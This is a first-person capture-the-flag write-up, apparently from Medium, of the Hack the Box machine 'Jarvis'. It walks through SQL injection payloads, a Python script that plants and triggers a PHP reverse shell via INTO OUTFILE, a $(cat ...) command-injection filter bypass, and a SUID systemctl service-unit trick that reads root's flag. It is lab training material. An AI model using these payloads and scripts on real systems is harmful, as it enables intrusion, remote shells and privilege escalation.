Jarvis — Hack the Box Writeup 0x01

Enumeration

I made a simple enumeration which everyone is used to:

Stark Hotel homepage

Exploitation

You can try it manually if you wish to learn or even remember how SQL injections work which was what I did, but here I will show how to use SQLMap to do it automatically for us.

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cod=1 AND 8040=8040
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cod=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: cod=-2183 UNION ALL SELECT CONCAT(0x7171707671,0x6c4145667857526d76456c6575436376564e5542714c524c53736971626c425079675a626a454364,0x7176707a71),NULL,NULL,NULL,NULL,NULL,NULL-- Prnv
[INFO] table 'hotel.room' dumped to CSV file '/home/<your home folder>/.sqlmap/output/10.10.10.143/dump/hotel/room.csv'
Stark Hotel database dump
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'www-data'

From www-data to Pepper

Some people tried running LinEnum which is fine since it will lead you the right way but after some experience with this level machines on HackTheBox, I went straight to $ sudo -l and looks like we can run a command with the privileges of the user Pepper and it won’t require a password.

os-shell> sudo -l
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
---
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | ‘_ ` _ \| ‘_ \| |/ _ \ ‘__| ‘_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es

***********************************************
********************************************************
* Simpler — A simple simplifier ;) *
* Version 1.0 *
********************************************************
Usage: python3 simpler.py [options]
Options:
-h/ — help : This help
-s : Statistics
-l : List the attackers IP
-p : ping an attacker IP
def exec_ping():
forbidden = ['&', ';', '-', '`', '||', '|']
command = input('Enter an IP: ')
for i in forbidden:
if i in command:
print('Got you')
exit()
os.system('ping ' + command)
$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es

***********************************************
Enter an IP: $(cat /home/pepper/user.txt)
ping: <REDACTED USER.TXT FLAG>: Temporary failure in name resolution

Getting a decent shell

Since SQLMap shell is limited let’s get us a decent shell first. You can get the reverse shell code in PHP from PentestMonkey, they work well on most of the occasions and are reliable.

[PAYLOAD] -4917 OR 4409=4409 LIMIT 0,1 INTO OUTFILE '/var/www/html/tmpuvubn.php' LINES TERMINATED BY <A GIANT HEX NUMBER HERE>-- -- uEyp
  1. -4917 OR 4409=4409 guarantees that the condition is true but won’t return any valid tuple from the database.
  2. LIMIT 0,1 is giving us the first result using the offset zero. LIMIT 1,3 would give us the second, third and fourth since it limits to three results with offset one.
  3. INTO OUTFILE '/file/path' will get the result into a file, no misteries here.
  4. LINES TERMINATED BY 0xHEX is where the magic happens. We had no results so we would print a blank line to the file but now we defined that each line printed will be terminated by 0xHEX and in SQLMap request the hexadecimal represents the reverse shell code string transformed to hexadecimal.
$ip = '<inserted my htb ip here>';  // CHANGE THIS
$port = 1337; // CHANGE THIS
from binascii import hexlify
from requests import get
from sys import argv
from string import ascii_lowercase as letters
from random import choice
# reads the file with reverse shell php code
with open(argv[1]) as f:
content = f.read()
# generates a random name to upload to the server
random_name = ''
for i in range(8):
random_name += choice(letters)
random_name += '.php'
# crafts the payload
payload = f'-4917 OR 4409=4409 LIMIT 0,1 INTO OUTFILE \'/var/www/html/{random_name}\' LINES TERMINATED BY 0x'
payload += hexlify(content.encode()).decode()
payload += '-- -- asda'
# print file name created
print(random_name)
# make the GET request with the sqli
url = 'http://10.10.10.143/room.php?cod=' + payload
try:
get(url, timeout=3)
except:
pass
# run it
url = 'http://10.10.10.143/' + random_name
get(url)
Connection from 10.10.10.143 51052 received!
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
19:04:58 up 4 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
20:45:27 up 10:21, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
pepper

From pepper to root

My approach was running the LinEnum and it gave me a really interesting output:

[+] Possibly interesting SUID files:
-rwsr-x--- 1 root pepper 174520 Feb 17 2019 /bin/systemctl
# this first line should be deleted when running it on htb
# it is basically creating a systemctl with setuid for
# proof of concept, we already have one
sudo sh -c 'cp $(which systemctl) .; chmod +s ./systemctl'
# Creates the variable TF and set it to the path of a temporary file
TF=$(mktemp).service
# Echoes all this text to the file in TF variable
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
# Links and enable the service created above
./systemctl link $TF
./systemctl enable --now $TF
TF="/home/pepper/this.service"
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /home/pepper/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF

SQLI Defender

As mentioned above there is a SQL injection defender which bans you for 90 seconds, you can use your root power to read the source code and understand how it works, just cat /root/sqli_defender.py .

A note about this writeup

This was my first writeup ever so it is far from perfect, I am not an experienced pen-tester neither experienced with HackTheBox. I am constantly learning and would appreciate any feedback.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store